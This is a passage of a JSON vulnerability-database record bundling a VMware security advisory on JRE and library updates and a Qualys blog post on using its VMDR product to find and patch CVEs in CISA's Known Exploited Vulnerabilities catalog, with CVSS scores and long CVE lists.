"https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2022-06-19T20:02:41", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2012-08-30T00:00:00", "type": "vmware", "title": "VMware vSphere and vCOps updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2012-12-20T00:00:00", "id": "VMSA-2012-0013.2", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.2.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}